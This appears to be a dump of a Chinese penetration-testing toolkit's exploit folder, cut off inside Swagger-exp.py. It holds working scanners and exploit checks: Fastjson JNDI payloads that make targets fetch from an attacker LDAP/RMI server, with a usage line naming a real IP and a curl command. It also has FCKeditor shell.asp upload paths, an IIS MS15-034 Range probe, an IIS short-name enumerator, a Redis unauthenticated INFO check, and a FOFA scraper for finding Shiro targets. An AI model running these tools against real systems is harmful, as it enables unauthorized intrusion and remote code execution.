58 | def fofa(word, pag_num, num = 5):
59 | index = 0#实际页数
60 | s = (base64.b64encode(word.encode('utf-8'))).decode('utf-8')
61 | ip_list = [] #定义存放所有ip的列表
62 | for i in range(1,num+1):
63 | #获取页面源码
64 | url = f"https://fofa.info/result?page={i}&qbase64={s}"
65 | try:
66 | text = requests.get(url=url,headers=headers,verify=False,timeout=10,cookies={'fofa_token':fofa_token,'refresh_token':refresh_token}).text
67 | except Exception as error:
68 | print("fofa函数中,获取页面源码时发生错误,错误所在地为text变量。详细错误为:%s"%type(error))
69 | continue
70 | tree = etree.HTML(text)
71 | #提取一个页面所有ip地址
72 | try:
73 | r = tree.xpath('//div[@id="__layout"]//div[@class="showListsContainer"]/div[@class="rightListsMain"]//a[@target="_blank"]/@href')
74 | #title = tree.xpath('//div[@class="contentLeft"]/p[1]/text()')
75 | #country = tree.xpath('//div[@class="contentLeft"]/p[3]/a[@class="jumpA"]/text()')
76 | except Exception as error:
77 | print('fofa函数中,提取页面ip地址时发生错误,错误所在地为r变量。详细错误为:%s'%error)
78 | return
79 | if len(r) == 0:
80 | break
81 | for m in range(len(r)):
82 | if "//" in r[m]:
83 | #将ip地址保存到列表中
84 | ip_list.append(r[m])
85 | #ip_list.append(r[m]+' '+ country[m])
86 | #ip_list.append(r[m] +' '+ title[m] +' '+ country[m])
87 | else:
88 | pass
89 | index = index + 1
90 | print(f'[*]第{i}页爬取完毕!')
91 | ip_list_new = list(set(ip_list)) #将ip地址去重,然后进行保存
92 | if int(pag_num) > index:
93 | print('[*]提示: 输入登录后的cookie即可获取更多数据哦!')
94 | print('[+]FOFA收集 %s 页结果如下, 总计 [%s]'%(str(index),len(ip_list_new)))
95 | for url in ip_list_new:
96 | print(url)
97 |
98 | print("用法: 在目标处输入查询语法,需要编辑源码修改refresh_token (普通用户默认查询5页)")
99 | def check(**kwargs):
100 | try:
101 | pag_num = pag_num_fun(kwargs['url'])
102 | fofa(kwargs['url'], pag_num)
103 | except Exception as e:
104 | print(type(e))
105 |
106 | if __name__ == '__main__':
107 | pag_num = pag_num_fun('app=\"Shiro权限管理系统\"')
108 | fofa('app=\"Shiro权限管理系统\"', pag_num)
109 |
110 |
111 |
112 |
113 |
114 |
115 |
116 |
117 |
118 |
119 |
120 |
121 |
122 |
123 |
124 |
125 |
126 |
127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
--------------------------------------------------------------------------------
/POC/Fastjson_RCE.py:
--------------------------------------------------------------------------------
1 | import requests,time,re,sys
2 | ###测试
3 | sys.path.append('../')
4 | from ClassCongregation import Dnslog
5 | #import ClassCongregation
6 | def check(**kwargs):
7 | url = kwargs['url']
8 | #VPSip
9 | Vurl = kwargs['ip']
10 | #VPSport
11 | port = kwargs['port']
12 |
13 | dns_cookie = kwargs['cookie']
14 | head = {
15 | "Content-Type":"application/json",
16 | "User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"
17 | }
18 |
19 | header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36'}
20 | payload_ldap = {
21 | "1.2.24":"{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://"+ Vurl+":"+port +"/Object\",\"autoCommit\":true}",
22 | "1.2.24_1":"{\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://"+ Vurl+":"+port +":10086/Object\",\"autoCommit\":true}}",
23 | "1.2.47":"{\"a\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://"+ Vurl+":"+port +"/Object\",\"autoCommit\":true}}}",
24 | "1.2.24_2":"{\"fybm3i\": {\"\\u0040type\": \"\\x63o\\u006D\\u002Es\\x75n.\\u0072ows\\u0065\\u0074.Jdbc\\x52\\x6F\\u0077\\x53e\\u0074\\u0049m\\x70l\",\"dataSourceName\": \"ldap://"+ Vurl+":"+port +"/Object\",\"autoCommit\": true}}"
25 | }
26 |
27 | payload_rmi = {
28 | "1.2.24":"{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://"+ Vurl+":"+port +"/Object\",\"autoCommit\":true}",
29 | "1.2.24_1":"{\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://"+ Vurl+":"+port +":10086/Object\",\"autoCommit\":true}}",
30 | "1.2.47":"{\"a\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://"+ Vurl+":"+port +"/Object\",\"autoCommit\":true}}}",
31 | "1.2.24_2":"{\"fybm3i\": {\"\\u0040type\": \"\\x63o\\u006D\\u002Es\\x75n.\\u0072ows\\u0065\\u0074.Jdbc\\x52\\x6F\\u0077\\x53e\\u0074\\u0049m\\x70l\",\"dataSourceName\": \"rmi://"+ Vurl+":"+port +"/Object\",\"autoCommit\": true}}"
32 | }
33 |
34 | payload_other = {
35 | "1":"{\"zeo\":{\"@type\":\"java.net.Inet4Address\",\"val\":\"nnivq5.dnslog.cn\"}}"
36 | }
37 | try:
38 | print('[*]正在利用LDAP测试...')
39 | for poc in payload_ldap:
40 | requests.post(url, headers=head, data=payload_ldap[poc], timeout=15, verify=False)
41 | time.sleep(0.5)
42 | rep1 = requests.get('http://dnslog.cn/getrecords.php', cookies={'PHPSESSID': dns_cookie} , headers=header, timeout=15)
43 |
44 | if 'dnslog' in rep1.text:
45 | print('[+]target is vulnerable')
46 | print('[+]fastjson version:{}'.format(poc))
47 | print('[+]poc:{}'.format(payload_ldap[poc]))
48 | return
49 | time.sleep(0.5)
50 | print('[*]正在利用RMI测试...')
51 | for poc in payload_rmi:
52 | requests.post(url, headers=head, data=payload_rmi[poc], timeout=15, verify=False)
53 | time.sleep(0.5)
54 | rep1 = requests.get('http://dnslog.cn/getrecords.php', cookies={'PHPSESSID': dns_cookie} , headers=header, timeout=15)
55 | if 'dnslog' in rep1.text:
56 | print('[+]target is vulnerable')
57 | print('[+]fastjson version:{}'.format(poc))
58 | print('[+]poc:{}'.format(payload_rmi[poc]))
59 | return
60 | print('[-]target is not vulnerable, or openjdk > 8u102')
61 | except Exception as e:
62 | print("异常对象的内容是%s"%e)
63 |
64 | print("[*]用法:java -cp fastjson_tool.jar fastjson.HLDAPServer 106.12.132.186 10086 \"curl xxx.dnslog.cn\"")
65 | print("[*]用法:cookie中要输入dnslog网站的PHPSESSID")
66 |
67 |
68 | if __name__ == "__main__":
69 | DL=Dnslog()
70 | a = DL.dns_host()
71 | print(a)
72 | if DL.dnslog_cn_dns():
73 | print('good')
74 |
--------------------------------------------------------------------------------
/POC/Fckeditor.py:
--------------------------------------------------------------------------------
1 | import requests,time
2 | from requests.packages import urllib3
3 | from CodeTest import color
4 | urllib3.disable_warnings()
5 |
6 | #敏感信息路径查找
7 | Fck_path_list = ['/editor/dialog/fck_about.html','/_whatsnew.html','/editor/filemanager/browser/default/connectors/test.html','/editor/filemanager/upload/test.html','/editor/filemanager/connectors/test.html','/editor/filemanager/connectors/uploadtest.html','/_samples/default.html','/_samples/asp/sample01.asp','/_samples/asp/sample02.asp','/_samples/asp/sample03.asp','/_samples/asp/sample04.asp','/editor/.htm','/editor/fckdialog.html','/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com//editor/filemanager/connectors/php/connector.php','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com//editor/filemanager/connectors/asp/connector.asp','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com//editor/filemanager/connectors/aspx/connector.aspx','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com//editor/filemanager/connectors/jsp/connector.jsp','/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.Aspx','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php','/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=/shel
l.asp&NewFolderName=z.asp','/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684','/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp','/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp','/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=e:/']
8 | VUL_LIST = []
9 |
10 | """
11 | :查找spring敏感路径泄露信息
12 | """
13 | def spider(urls,time):
14 | """
15 | :return:VUL_LIST
16 | """
17 | s = requests.session()
18 | s.trust_env = False
19 | s.verify = False
20 | status_code = None
21 | s.headers = {
22 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
23 | 'Accept-Encoding': 'gzip, deflate, br',
24 | 'Accept-Language': 'zh-CN,zh;q=0.9',
25 | 'Connection': 'close',
26 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36'
27 | }
28 | for path in Fck_path_list:
29 | urls_path = urls + path
30 | #urls = 'http://110.53.243.248:9006/swagger-ui.html'
31 | try:
32 | content = s.get(urls_path, headers=s.headers, timeout=time, allow_redirects=False)
33 | status_code = content.status_code
34 | if status_code != 404:
35 | VUL_LIST.append(path)
36 | color('[+] %s %s'%(urls_path,str(status_code)),'green')
37 | else:
38 | color('[-] %s %s'%(urls_path,str(status_code)),'red')
39 | except Exception as e:
40 | print('[-] 请求 %s 出现异常 %s'%(urls_path,type(e)))
41 | continue
42 | return VUL_LIST
43 |
44 | def check(**kwargs):
45 | try:
46 | urls = kwargs['url']#/*str*/
47 | urls = urls.strip('/')
48 | VUL_LIST = spider(urls, 3)
49 |
50 | if '/jolokia' in VUL_LIST or '/actuator/jolokia' in VUL_LIST:
51 | print('https://github.com/LandGrey/SpringBootVulExploit')
52 | print('0x03:获取被星号脱敏的密码的明文 (方法一)')
53 | print('0x04:jolokia logback JNDI RCE')
54 | print('0x05:jolokia Realm JNDI RCE')
55 |
56 | elif '/env' in VUL_LIST and '/refresh' in VUL_LIST:
57 | print('https://github.com/LandGrey/SpringBootVulExploit')
58 | print('0x04:获取被星号脱敏的密码的明文 (方法二)')
59 | print('0x05:获取被星号脱敏的密码的明文 (方法三)')
60 | print('0x02:spring cloud SnakeYAML RCE')
61 | print('0x03:eureka xstream deserialization RCE')
62 | print('0x06:h2 database query RCE')
63 | print('0x08:mysql jdbc deserialization RCE')
64 |
65 | elif '/heapdump' in VUL_LIST or '/actuator/heapdump' in VUL_LIST:
66 | print('https://github.com/LandGrey/SpringBootVulExploit')
67 | print('0x06:获取被星号脱敏的密码的明文 (方法四)')
68 | else:
69 | print('[-] 未找到相关漏洞信息, 请参阅: https://github.com/LandGrey/SpringBootVulExploit')
70 | #print(VUL_LIST)
71 | return VUL_LIST
72 | except Exception as e:
73 | print('脚本执行出错 %s'%e)
74 |
75 | if __name__ == "__main__":
76 | a = check(**{'url':'http://www.baidu.com'})
77 | #print(a)
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
--------------------------------------------------------------------------------
/POC/IIS_MS15-034_Range_bytes.py:
--------------------------------------------------------------------------------
1 | try:
2 | import requests
3 | import sys
4 | except ImportError as ierr:
5 | print("Error, looks like you don';t have %s installed", ierr)
6 |
7 | def identify_iis(domain):
8 | req = requests.get(str(domain), verify=False)
9 | remote_server = req.headers['server']
10 |
11 | if "Microsoft-IIS" in remote_server:
12 | print("[+] 服务是 " + remote_server)
13 | ms15_034_test(str(domain))
14 | else:
15 | print("[-] 不是IIS\n可能是: " + remote_server)
16 |
17 | def ms15_034_test(domain):
18 | print("[*] 启动vuln检查!")
19 | headers = {"Range":"bytes=0-18446744073709551615"}
20 | #vuln_buffer = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n";
21 | try:
22 | req = requests.get(str(domain), headers=headers, verify=False)
23 | if "Requested Range Not Satisfiable" in str(req.content):
24 | print("[+] 存在漏洞")
25 | return 1
26 | else:
27 | print("[-] IIS服务无法显示漏洞是否存在. "+"需要手动检测")
28 | return
29 | except Exception as e:
30 | print('发生错误%s'%e)
31 |
32 | print("[*]用法:Range: bytes=0-18446744073709551615")
33 | def check(**kwargs):
34 | result = ms15_034_test(kwargs['url'])
35 | return result
36 | if __name__ == '__main__':
37 | identify_iis(sys.argv[1])
38 |
39 |
40 |
41 |
--------------------------------------------------------------------------------
/POC/IIS_shortname_Scan.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding:utf-8
3 | # An IIS short_name scanner my[at]lijiejie.com http://www.lijiejie.com
4 |
5 |
6 | import sys
7 | import http.client
8 | from urllib import parse
9 | import threading
10 | import queue as Queue
11 | import time
12 |
13 |
class Scanner():
    """IIS short-name (8.3 "~1") enumeration scanner.

    The oracle is a status-code difference: a wildcard path that can match an
    existing short name gets a 404, one that cannot gets something else
    (see is_vul() and _scan_worker()). Threading note: __init__ starts the
    _print thread immediately and that thread only exits once STOP_ME is set
    and msg_queue has drained, so every code path that constructs a Scanner
    must eventually set STOP_ME (run() does).
    """
    def __init__(self, target):
        # target: base URL; 'http://' is prepended when no scheme is given.
        self.target = target.lower()
        if not self.target.startswith('http'):
            self.target = 'http://%s' % self.target
        # NOTE(review): parses the caller's original `target`, not the
        # normalised self.target, so a target given without a scheme yields an
        # empty scheme/netloc here — confirm whether self.target was intended.
        self.scheme, self.netloc, self.path, params, query, fragment = \
            parse.urlparse(target)
        if self.path[-1:] != '/': # ends with slash
            self.path += '/'
        self.alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789_-'
        self.files = []
        self.dirs = []
        self.queue = Queue.Queue()  # pending (url_prefix, extension) work items
        self.lock = threading.Lock()  # created but not used by any method below
        self.threads = []
        self.request_method = ''  # chosen by is_vul(); read by _get_status()
        self.msg_queue = Queue.Queue()  # progress lines drained by _print()
        self.STOP_ME = False
        threading.Thread(target=self._print).start()

    def _conn(self):
        # Open a fresh connection per request. Returns None on failure, which
        # _get_status() then turns into an exception at .request().
        try:
            if self.scheme == 'https':
                conn = http.client.HTTPSConnection(self.netloc)
            else:
                conn = http.client.HTTPConnection(self.netloc)
            return conn
        except Exception as e:
            print('[_conn.Exception]%s'%e)
            return None

    def _get_status(self, path):
        # Send one request using self.request_method and return only the
        # status code. Any failure is re-raised as a generic Exception; note
        # that conn.close() is not reached on that path.
        try:
            conn = self._conn()
            conn.request(self.request_method, path)
            status = conn.getresponse().status
            conn.close()
            return status
        except Exception as e:
            raise Exception('[_get_status.Exception] %s' % str(e) )

    def is_vul(self):
        # Oracle check: a wildcard that can match an existing entry must give
        # 404 while one that cannot match must give a different status. GET is
        # tried first, then OPTIONS; request_method keeps the last value tried.
        try:
            for _method in ['GET', 'OPTIONS']:
                self.request_method = _method
                status_1 = self._get_status(self.path + '/*~1*/a.aspx') # an existed file/folder
                status_2 = self._get_status(self.path + '/l1j1e*~1*/a.aspx') # not existed file/folder
                if status_1 == 404 and status_2 != 404:
                    return True
            return False
        except Exception as e:
            raise Exception('[is_vul.Exception] %s' % str(e) )

    def run(self):
        # Seed the queue with one single-character prefix per alphabet entry,
        # fan out 20 workers, wait for all of them, then release _print().
        for c in self.alphanum:
            self.queue.put( (self.path + c, '.*') ) # filename, extension
        for i in range(20):
            t = threading.Thread(target=self._scan_worker)
            self.threads.append(t)
            t.start()
        for t in self.threads:
            t.join()
        self.STOP_ME = True

    def report(self):
        # Print everything collected; the trailing note explains the '*' left
        # in names whose remaining characters were not enumerated.
        print('-'*64)
        for d in self.dirs:
            print('Dir: %s' % d)
        for f in self.files:
            print('File: %s' % f)
        print('-'*64)
        print('%d Directories, %d Files found in total' % (len(self.dirs), len(self.files)))
        print('Note that * is a wildcard, matches any character zero or more times.')

    def _print(self):
        # Background printer: keeps draining msg_queue after STOP_ME is set
        # until it is empty, so no progress line is lost.
        while not self.STOP_ME or (not self.msg_queue.empty()):
            if self.msg_queue.empty():
                time.sleep(0.05)
            else:
                print(self.msg_queue.get())

    def _scan_worker(self):
        # Worker loop: take (prefix, ext) items until the queue stays empty for
        # 1 s, then exit. A 404 means the wildcard matched: grow the name one
        # character at a time (first 6 chars only), then the extension.
        # dirs/files are appended from several threads without self.lock.
        while True:
            try:
                url, ext = self.queue.get(timeout=1.0)
                status = self._get_status(url + '*~1' + ext + '/1.aspx')
                if status == 404:
                    self.msg_queue.put('[+] %s~1%s\t[scan in progress]' % (url, ext))

                    if len(url) - len(self.path)< 6: # enum first 6 chars only
                        for c in self.alphanum:
                            self.queue.put( (url + c, ext) )
                    else:
                        if ext == '.*':
                            self.queue.put( (url, '') )

                        if ext == '':
                            self.dirs.append(url + '~1')
                            self.msg_queue.put('[+] Directory ' + url + '~1\t[Done]')

                        elif len(ext) == 5 or (not ext.endswith('*')): # .asp*
                            self.files.append(url + '~1' + ext)
                            self.msg_queue.put('[+] File ' + url + '~1' + ext + '\t[Done]')

                        else:
                            for c in 'abcdefghijklmnopqrstuvwxyz0123456789':
                                self.queue.put( (url, ext[:-1] + c + '*') )
                                if len(ext) < 4: # < len('.as*')
                                    self.queue.put( (url, ext[:-1] + c) )

            except Queue.Empty as e:
                break
            except Exception as e:
                print('[Exception]', e)
128 |
# Usage hint emitted as a side effect of importing this module.
print('[*]用法:', '[URL]')
def check(**kwargs):
    """Framework entry point for kwargs['url'].

    Runs the vulnerability oracle and prints the verdict, then runs the full
    enumeration and the report. Returns None.
    """
    s = Scanner(kwargs['url'])
    if not s.is_vul():
        s.STOP_ME = True
        print('[-] 目标不存在IIS短文件漏洞')
        #return
    else:
        print('[+] 目标存在IIS短文件漏洞')
        #return 1
    # NOTE(review): indentation was lost in this listing; as reconstructed,
    # run() and report() execute even when is_vul() returned False because
    # the early `return` above is commented out (compare the __main__ block
    # below, which exits instead). Confirm against the original file.
    s.run()
    s.report()
141 |
142 |
143 |
if __name__ == '__main__':
    # CLI wrapper: same flow as check(), but exits early on a non-vulnerable host.
    if len(sys.argv) == 1:
        print('Usage: python IIS_shortname_Scan.py http://www.target.com/')
        sys.exit()

    target = sys.argv[1]
    scanner = Scanner(target)
    if not scanner.is_vul():
        # Release the printer thread before leaving.
        scanner.STOP_ME = True
        print('Server is not vulnerable')
        sys.exit(0)

    print('Server is vulnerable, please wait, scanning...')
    scanner.run()
    scanner.report()
159 |
160 |
161 |
162 |
163 |
164 |
165 |
166 |
--------------------------------------------------------------------------------
/POC/JSencode.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 | import os
3 | import execjs
4 | import threading
5 |
# Defaults used by check(); Encode() resolves the two file names under
# ./POC/js_examples/ and calls the JS function named by encode_fun.
passfile, jsfile, encode_fun = "top100password.txt", "md5.js", "hex_md5"
9 |
10 |
def info():
    """Print the banner describing the module-level knobs (passfile, jsfile, encode_fun)."""
    banner = (
        "[+]============================================================",
        "[+] Python调用JS加密password文件内容 ",
        "[+] passfile : 密码字典 ",
        "[+] jsfile : JS文件 ",
        "[+] encode_fun : 加密函数 ",
        "[+]============================================================",
        " ",
    )
    # One write instead of seven prints; the byte stream is identical.
    print("\n".join(banner))
20 |
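def Encode(jsfile, passfile):
    """Run the JS function named by encode_fun over every line of *passfile*.

    Args:
        jsfile: JS file name, resolved under ./POC/js_examples/.
        passfile: wordlist file name, resolved under ./POC/js_examples/.

    Side effects: sets EXECJS_RUNTIME for the whole process and prints one
    line per input word ('[+]' on success, '[-]' when the JS call fails).
    Returns None.
    """
    os.environ["EXECJS_RUNTIME"] = 'Phantomjs'
    jsfile = './POC/js_examples/' + jsfile
    passfile = './POC/js_examples/' + passfile
    print("[+] 正在进行加密,请稍后......")
    with open(jsfile, 'r') as strjs:
        src = strjs.read()
    getpass = execjs.compile(src)
    with open(passfile, 'r') as strpass:
        for passwd in strpass:
            passwd = passwd.strip()
            try:
                mypass = getpass.call(encode_fun, passwd)
                print("[+] %s 加密完成: %s" % (passwd, mypass))
            except Exception:
                # Was a bare `except:`, which also swallowed KeyboardInterrupt
                # and SystemExit; only failures of the JS call are meant to be
                # skipped.
                print("[-] %s 加密失败" % passwd)
    print("[+] 加密完成")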
43 |
44 | #对单一密码进行加密
def passstring(jsfile, password):
    """Run encode_fun from the JS file at *jsfile* on one *password* and print the result.

    Unlike Encode(), the path is used as given and the PhantomJS runtime is
    selected explicitly through execjs.get('PhantomJS').
    """
    print("[+] 正在进行加密,请稍后......")
    with open(jsfile, 'r') as js_source:
        src = js_source.read()
    runtime = execjs.get('PhantomJS')
    compiled = runtime.compile(src)
    encoded = compiled.call(encode_fun, password)
    print("[+] 加密完成:{}".format(encoded))
53 |
54 | info()
def check(**kwargs):
    """Framework entry point: run Encode() on a background thread.

    kwargs are accepted for interface compatibility but not read. The thread
    is not joined, so the caller returns before the output is complete.
    """
    worker = threading.Thread(target=Encode, args=(jsfile, passfile))
    worker.start()
58 |
if __name__ == "__main__":
    # check() ignores its kwargs; any mapping works here.
    opts = {"1": "1"}
    check(**opts)
61 |
62 |
63 |
64 |
65 |
66 |
--------------------------------------------------------------------------------
/POC/Nginx_iis_scan.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # -*- coding: UTF-8 -*-
3 | import requests
4 | import urllib3
5 | import threading
6 | import queue
7 | import sys,getopt
8 | sys.path.append('../')
9 | from ClassCongregation import _urlparse
10 |
# Tolerated difference (in characters) between the two probe bodies compared
# in Nginx_iis_scan(). Original author's note: suggested range 5-10, already
# tuned, do not change.
error = 20
urllib3.disable_warnings()
13 |
def Nginx_iis_scan(url):
    """Probe *url* (a static-resource URL) for the Nginx/IIS parse-path issue.

    Two requests are compared: the resource with '/.php' appended and the
    same resource with a control suffix. When the first returns 200 and the
    two body lengths differ by more than the module-level `error`, the host
    is reported and True is returned. Every other outcome prints one line
    and returns None; request errors are printed, not raised.
    """
    php_suffix = '/.php'
    control_suffix = '/.232index'  # control request; lowers false positives
    try:
        first = requests.get(url=url + php_suffix, verify=False, timeout=5)
        if first.status_code != 200:
            print(url + php_suffix + ' ' + str(first.status_code))
            return None
        second = requests.get(url=url + control_suffix, verify=False, timeout=5)
        delta = len(first.text) - len(second.text)
        if abs(delta) <= error:
            print(url + control_suffix + ' No Loophole')
            return None
        print(url + ' 确定存在解析漏洞')
        return True
    except Exception as e:
        print(url, str(e))
33 |
# Usage hint emitted as a side effect of importing this module.
print('[*]请输入目标服务器上存在的静态资源文件链接,如', 'http://www.baidu.com/robots.txt')
def check(**kwargs):
    """Framework entry point: run Nginx_iis_scan on kwargs['url']; its result is not returned."""
    target = kwargs['url']
    Nginx_iis_scan(target)
37 |
if __name__ == "__main__":
    # Self-test against a fixed URL normalised by the project's _urlparse helper.
    sample = _urlparse("http://baidu.com/123.php")
    Nginx_iis_scan(sample)
    print('task complete~~~~~~~~~~ 完了')
41 |
42 |
43 |
44 |
--------------------------------------------------------------------------------
/POC/Redis_unauthorized_access.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | import socket
4 |
# (service name, default port) tag; not read anywhere in this file — presumably
# consumed by the framework's dispatcher, verify against the caller.
vuln = ['redis', '6379']
6 |
# Usage hint emitted as a side effect of importing this module.
print('[*]Usage:', '[IP]')
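def check(**kwargs):
    """Test whether the Redis instance at kwargs['ip'] answers INFO without AUTH.

    Args (via kwargs):
        ip: target address.
        port: optional TCP port, default 6379 (the original hard-coded it).

    Prints a '[+]' line when the reply contains 'redis_version' (the server
    answered without authentication), '[-]' otherwise, and a '[-]' error line
    when the connection or exchange fails — the original closed the socket
    and printed nothing in that case. Returns None.
    """
    ip = kwargs['ip']
    port = int(kwargs.get('port', 6379))
    # RESP encoding of the one-argument command INFO: "*1\r\n$4\r\ninfo\r\n".
    payload = b'\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
    try:
        # create_connection applies the timeout to connect() as well; the
        # `with` block closes the socket on every path (the original only
        # closed it explicitly in each branch).
        with socket.create_connection((ip, port), timeout=5) as s:
            s.sendall(payload)
            data = s.recv(1024)
    except OSError as e:
        print('[-]connection failed: %s' % e)
        return
    if b"redis_version" in data:
        print('[+]%d Redis Unauthorized Access' % port)
    else:
        print('[-]target is not vulnerable')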
25 |
26 |
27 |
28 |
29 |
--------------------------------------------------------------------------------
/POC/Scan_zip.py:
--------------------------------------------------------------------------------
1 | import urllib.parse
2 | import requests
3 | import time
4 | from bs4 import BeautifulSoup
5 |
# Sent with every request in check(): limits each response body to its first
# 5000 bytes, which is all the title extraction and status checks need.
headers = {"Range":"bytes=0-4999"}
7 |
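def check(**kwargs):
    """Look for date-named archives (<title><YYYY><MMDD>.zip/.rar) under kwargs['url'].

    The site title (decoded with the charset from the Content-Type header, or
    gb2312 when none is given) is URL-quoted and used as the file-name
    prefix. For each year in year_list, each MMDD with days 01..31 in every
    month (invalid dates included, exactly as the original literal list) and
    both extensions, one GET is sent: a 404 is printed as '[-]', any other
    status or a request error as '[?]'. Prints '[-] 无法获取系统title' and
    returns early when the title cannot be read. Returns None.
    """
    root_url = kwargs['url'].strip('/')
    try:
        req = requests.get(root_url, timeout=1, headers=headers)
        content_type_header = req.headers['content-type']
        if '=' in content_type_header:
            charset = content_type_header.split('=')[1]
        else:
            charset = "gb2312"
        soup = BeautifulSoup(req.text, 'lxml')
        system = soup.title.string.encode(charset, errors='ignore').decode(charset)
    except Exception:
        print('[-] 无法获取系统title')
        return
    system = urllib.parse.quote(system)
    year_list = ["2018", "2019", "2020", "2021"]
    # Same 372 entries as the original literal list: days 01..31 of every month.
    date_file = ['%02d%02d' % (month, day) for month in range(1, 13) for day in range(1, 32)]
    ext_list = [".zip", ".rar"]
    for y in year_list:
        print("%s年:" % y)
        for d in date_file:
            for e in ext_list:
                url = root_url + '/' + system + y + d + e
                try:
                    resp = requests.get(url, timeout=1, headers=headers)
                except Exception:
                    # Narrowed from a bare `except:` so Ctrl-C can still stop
                    # the loop; the printed line is unchanged.
                    print("[?]" + url + ": " + "?")
                    continue
                if resp.status_code == 404:
                    print("[-] " + url + ": " + str(resp.status_code))
                else:
                    print("[?]" + url + ": " + "?")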
--------------------------------------------------------------------------------
/POC/Swagger-exp.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- encoding: utf-8 -*-
3 | # Swagger REST API Exploit
4 | # By LiJieJie my[at]lijiejie.com
5 |
6 | import requests
7 | import json
8 | import time
9 | from urllib.parse import urlparse
10 | from ClassCongregation import color
11 |
requests.packages.urllib3.disable_warnings()
# Module state shared by the functions below.
api_set_list = [] # every API document URL found by find_all_api_set(); cleared by check()
scheme = 'http' # default value; check() switches it to 'https' for https targets
headers = {'User-Agent': 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36'}
auth_bypass_detected = False # set by scan_api() when a retried request is not answered 401/403
17 |
18 |
def print_msg(msg, colors='black'):
    """Print *msg* with an HH:MM:SS timestamp through ClassCongregation.color.

    Args:
        msg: text to print.
        colors: colour name passed straight through to color().
    """
    stamp = time.strftime('%H:%M:%S', time.localtime())
    color('[%s] %s' % (stamp, msg), colors)
23 |
24 |
def find_all_api_set(start_url):
    """Collect Swagger API documents reachable from *start_url* into api_set_list.

    A swagger.json body (starts with '{"swagger":"') is recorded and also
    written to ./data/api-docs.json — relative to the working directory and
    overwritten on every hit. A /swagger-resources/ listing (contains
    "swaggerVersion") is followed recursively through each item's
    'location'. Anything else is reported as an invalid document. Errors
    are printed, never raised.
    """
    try:
        text = requests.get(start_url, headers=headers, verify=False).text
        if text.strip().startswith('{"swagger":"'):
            api_set_list.append(start_url)
            print_msg('[OK] [API set] %s' % start_url)
            with open('./data/api-docs.json', 'w', encoding='utf-8') as f:
                f.write(text)
        elif text.find('"swaggerVersion"') > 0:
            base_url = start_url[:start_url.find('/swagger-resources')]
            for item in json.loads(text):
                find_all_api_set(base_url + item['location'])
        else:
            print_msg('[FAIL] Invalid API Doc: %s' % start_url)
    except Exception as e:
        print_msg('[find_all_api_set] process error %s' % e)
43 |
44 |
def _param_placeholder(parameter):
    """Return the placeholder text for one Swagger parameter definition.

    Precedence mirrors the original chain: 'format', then schema.format,
    schema.type, schema.$ref (rendered as {OBJECT_<name>}), then 'type',
    else the literal 'unkonwn'.
    """
    if 'format' in parameter:
        return parameter['format']
